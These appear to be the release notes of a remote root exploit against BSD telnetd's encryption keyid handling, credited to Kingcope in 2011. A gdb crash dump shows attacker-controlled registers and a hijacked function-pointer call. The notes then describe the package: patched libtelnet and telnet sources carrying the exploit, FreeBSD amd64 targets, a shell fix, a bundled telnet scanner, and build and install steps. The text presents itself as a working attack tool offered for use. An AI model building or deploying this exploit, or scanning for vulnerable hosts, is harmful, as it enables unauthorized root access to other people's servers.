ancient bsd remote root zeroday (encryption keyid overflow)Discovered & Exploi

1. ancient bsd remote root zeroday (encryption keyid overflow)
2. Discovered & Exploited by Kingcope
3. Year 2011
4. --
5.  
6. We overwrite function pointer.
7.  
8. encrypt.c last commit (freebsd):
9. Wed Jun 26 17:06:14 2002 UTC (8 years, 9 months ago) by markm
10. and even older bug :>
11.  
12. attached telnetd:
13. Program received signal SIGSEGV, Segmentation fault.
14. 0x08055b22 in encrypt_keyid (kp=0x805e6a0, keyid=0x8061f02 'A' <repeats 100 times>, "ÿðð", len=100) at
15. /usr/src/lib/libtelnet/../../contrib/telnet/libtelnet/encrypt.c:724
16. warning: Source file is more recent than executable.
17.  
18. 724 if (!(ep = (*kp->getcrypt)(*kp->modep))) {
19. (gdb) i r
20. eax 0x41414141 1094795585
21. ecx 0x64 100
22. edx 0x41414141 1094795585
23. ebx 0xbfbfec78 -1077941128
24. esp 0xbfbfe770 0xbfbfe770
25. ebp 0xbfbfe798 0xbfbfe798
26. esi 0x1 1
27. edi 0xbfbfec80 -1077941120
28. eip 0x8055b22 0x8055b22
29. eflags 0x10282 66178
30. cs 0x33 51
31. ss 0x3b 59
32. ds 0x3b 59
33. es 0x3b 59
34. fs 0x3b 59
35. gs 0x1b 27
36. (gdb) x/10i $eip
37. 0x8055b22 <encrypt_keyid+34>: mov (%eax),%eax
38. 0x8055b24 <encrypt_keyid+36>: mov %eax,(%esp)
39. 0x8055b27 <encrypt_keyid+39>: call *%edx <---- HAHA
40. 0x8055b29 <encrypt_keyid+41>: mov %eax,0xfffffffc(%ebp)
41. 0x8055b2c <encrypt_keyid+44>: cmpl $0x0,0xfffffffc(%ebp)
42. 0x8055b30 <encrypt_keyid+48>: jne 0x8055b4b <encrypt_keyid+75>
43. 0x8055b32 <encrypt_keyid+50>: cmpl $0x0,0x10(%ebp)
44. 0x8055b36 <encrypt_keyid+54>: je 0x8055c87 <encrypt_keyid+391>
45. 0x8055b3c <encrypt_keyid+60>: mov 0x8(%ebp),%eax
46. 0x8055b3f <encrypt_keyid+63>: movl $0x0,0x40(%eax)
47. (gdb)
48.  
49. * main patch code and exploit logic is in libtelnet/encrypt.c & telnet/telnet.c
50. * targets are defined in telnet/targets.h
51. * added FreeBSD amd64 targets
52. * fixed a bug where the shell would close on freebsd.
53. * a simple telnet scanner is included (telnetscan.c)
54.  
55. how to build:
56. 1.) checkout src-all via freebsd cvsup
57. 2.) untar the package into /usr/src/contrib/
58. 3.) cd into /usr/src/lib/libtelnet and type make && make install
59. cd into /usr/src/usr.bin/telnet and type make && make install